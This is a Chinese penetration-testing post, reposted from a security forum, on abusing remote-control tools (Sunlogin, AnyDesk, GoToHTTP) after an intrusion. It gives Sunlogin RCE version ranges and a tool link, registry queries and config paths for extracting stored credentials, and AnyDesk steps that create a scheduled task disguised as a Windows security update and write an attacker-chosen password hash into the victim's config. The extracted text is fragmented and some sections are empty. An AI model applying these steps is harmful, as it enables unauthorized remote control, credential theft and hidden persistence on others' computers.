0x00 前言
0x01 向日葵
向日葵个人版
for
Windows &
lt
;=
11.0
.
0
.
33
向日葵简约版 &
lt
;= V1.
0
.
1.43315
(
2021.12
)
测试客户端漏洞版本:
11.0
.
0
.
33162
攻击过程:
tasklist查看是否有sunlogin的进程
直接用golang的工具来进行攻击即可
https:
//github.com/Mr-xn/sunlogin_rce
向日葵(不可以攻击)
(1) 窃取配置文件来进行解密(低版本 版本号具体未知)
(2) 在12.5.2之前的某些版本可以写到了注册表中,所以可以使用注册表来进行查询
reg
query
HKEY
\_
USERS
\\
.DEFAULT
\\
Software
\\
Oray
\\
SunLogin
\\
SunloginClient
\\
SunloginInfo
reg
query
HKEY
\_
USERS
\\
.DEFAULT
\\
Software
\\
Oray
\\
SunLogin
\\
SunloginClient
\\
SunloginGreenInfo
向日葵默认配置文件路径:
安装版:
C
:\\
Program
Files
\\
Oray
\\
SunLogin
\\
SunloginClient
\\
config
.ini
便携版:
C
:\\
ProgramData
\\
Oray
\\
SunloginClient
\\
config
.ini
本机验证码参数:
encry
\_
pwd
本机识别码参数:
fastcode
(去掉开头字母)
sunlogincode
:判断用户是否登录状态
在向日葵高于12.5.3.*的已经没有办法获取secert了
0x02 todesk
0x03 anydesk
anydesk的配置文件在以下文件中,而通常这个时候我们有权限修改anydesk的配置文件。
C:\Users\用户名\AppData\Roaming\AnyDesk
攻击机
ip
: 10
.211
.55
.3
+ 10
.211
.55
.2
受害机
ip
: 10
.211
.55
.4
(
windows
defender
全开)
情景复现1
这里拿到了受害机的webshell,是个普通权限,无法去关闭
情景复现2(计划任务)
(1) 确定用户创建计划任务
powershell
"(((Get-WmiObject -Class Win32_Process -Filter 'Name=\"
explorer.exe\
"').GetOwner().user) -split '\n')[0]
schtasks /Create /TN Windows_Security_Update /SC monthly /tr "
C:\Users\testuser.G1TS\Desktop\anydesk.exe
" /RU 用户名
执行计划任务
schtasks
/run /tn Windows_Security_Update
后续步骤和上面相同
然后添加密码到配置文件中去即可。
echo ad.anynet.pwd_hash=
85352
d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c
C:
Users用户目录AppDataRoamingAnyDeskservice.conf
echo ad.anynet.pwd_salt=cb65156829a1d5a7281bfe8f6c98734a
C:
Users用户目录AppDataRoamingAnyDeskservice.conf
然后查看用户的id
type
C:Users用户名AppDataRoamingAnyDesksystem.conf
连接即可
优点:
缺点:
(2) 启动anydesk的权限需要桌面用户权限,比如,IIS做了中间件环境,拿到的webshell一般都是没有桌面用户权限,如果启动anydesk是不会成功的。
0x04 gotohttp
复现过程
https:
//gotohttp.com/
因为是普通用户启动的,这里如果尝试关闭windows defender,是无法进行点击的。
0x05 参考
文章来源:奇安信攻防社区(Q16G)
原文地址:https:
//forum.butian.net/share/2310
原文始发于微信公众号(潇湘信安):内网渗透之远程控制软件利用总结!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论